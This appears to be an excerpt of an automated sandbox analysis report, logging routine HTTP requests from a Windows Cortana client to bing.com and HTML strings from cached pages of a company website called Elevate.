Source: global traffic	HTTP traffic detected: GET /rp/dae1eD06shOtvLXODcWefBj-c4Q.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/eEeyUDaPc605RXeeN1fbn7yWGC0.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/hvBI6JcM3fiurYJTqWZEAiEc9uY.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c%3A&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=1d6572b5175f4a8fa0654033c9129a55&ig=ca6bb0045fe94a28aea5a3e4d04a5b74 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=1d6572b5175f4a8fa0654033c9129a55&ig=5be0c7daf1624792ba5551ca6ba332f0 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/ir34uLC35WF1sY2N-nv7lDNxLng.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/lA7OChSO-itFm5e9_qLjGL6O1QM.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/nrn0gNK7unWcRwsjmQ63z4yrlgo.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/oFjhPfAE6_U0PHIglZv0OCyOg2E.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/pCYxgMw9oTm68Xg7OdrI9hylvf8.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/pyuPhXK8l-xFBxa9DuSIQj-yyIc.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/tBpXlF3sjMQG5dYd3N9wm6DnoIE.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/tIcSGdw0KKZBXl-9dyaGHmf0tCY.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/wfEXc3aEPq6rcYq0ZJTmJluzF0M.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/x_3qvwDia52Yk8BT-lka6wZS3R4.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/zndPBVydyQ6eRKaiC_BVZLXnAIU.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rs/2d/3t/cir3,ortl,cc,nc/HTtwxidvByGPeR1IbVBmzc6JMFE.css?or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rs/5V/1Vi/ortl,cc,nc/onra7PQl9o5bYT2lASI1BE4DDEs.css?or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rs/6q/fy/nj/aABLNT_FV45QjYQfnRHrBCAk4GU.js?or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/hryYQjSSxM60EncpgnftvSF-LTo.js HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1749250591129&AC=4&CPH=23077e13; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=SRCHLANG=de&LUT=1749250591129; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1749250592128&AC=1&CPH=23077e13; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=SRCHLANG=de&LUT=1749250591129; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D

Source: chromecache_309.1.dr	String found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="6543a74692ff2d459ec1311f" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You're successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
Source: chromecache_357.1.dr	String found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="65a95d045c1e15ba2a305fe5" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You're successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div 